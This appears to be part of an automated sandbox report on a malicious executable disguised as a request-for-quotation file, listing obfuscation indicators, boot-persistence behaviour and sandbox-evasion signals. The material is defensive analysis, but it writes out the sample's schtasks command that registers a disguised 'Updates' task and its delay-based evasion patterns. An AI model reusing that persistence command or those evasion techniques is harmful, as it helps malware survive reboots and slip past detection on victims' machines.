Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Y06dj4BVu05CPVc5SN.cs High entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, C9unB7URCgbFq78hEl.cs High entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YXd5RkTUGDmJACNkFp.cs High entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, h6mhv9m54O6mTAWZxY.cs High entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Fnk71RzLmXXcJ9kRSj.cs High entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, jf4Qf9XFgnwgV28YTi.cs High entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, EXP714sBm2ctecZFQ5.cs High entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, yNnsJdCNHPcY1XMT4rt.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs High entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, vfkoEZCFRkJoTb50MAj.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, NZGTi0WPFvt2i5LQMG.cs High entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, dBMNChvaYpUXNoIXaf.cs High entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, mjll2lncEU9TxwTknr.cs High entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, By1IY6fiKcunMsajFa.cs High entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YChN0VCCf5YB3QfasmB.cs High entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, gAaOnDG3SbsRr2mZsZ.cs High entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Lv1bZR1o53kqNJhWi9.cs High entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, LF6Z39NPmJiiGMGn5i.cs High entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, oxcHW9d8Tk42VoYgoA.cs High entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs High entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Y06dj4BVu05CPVc5SN.cs High entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, C9unB7URCgbFq78hEl.cs High entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YXd5RkTUGDmJACNkFp.cs High entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, h6mhv9m54O6mTAWZxY.cs High entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Fnk71RzLmXXcJ9kRSj.cs High entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Boot Survival

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Source: C:\Windows\System32\wbem\WMIADAP.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\wbem\WMIADAP.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7428, type: MEMORYSTR
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 1530000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 30B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 2E00000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 7E30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 8E30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 8FE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 9FE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 1620000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 50D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 1110000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2F80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 77D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 87D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 8960000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 9960000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 4820000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599874
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599655
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599326
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599107
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597797
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597687
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597578
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597469
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597359
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597250
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597139
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597031
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596922
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596812
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596594
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596484
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596375
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596265
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596156
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596047
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595937
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595828
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595719
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595609
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595500
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595390
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595281
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595172
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595062
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594953
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594843
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594720
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594594
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599541
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598560
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597885
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597232
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5746
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 664
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Window / User API: threadDelayed 1814
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Window / User API: threadDelayed 8049
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Window / User API: threadDelayed 1284
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Window / User API: threadDelayed 8573
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1317
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1251
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 851
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1244
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1094
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 3480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732 Thread sleep count: 4920 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 368 Thread sleep count: 216 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564 Thread sleep count: 1814 > 30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7564 Thread sleep count: 8049 > 30
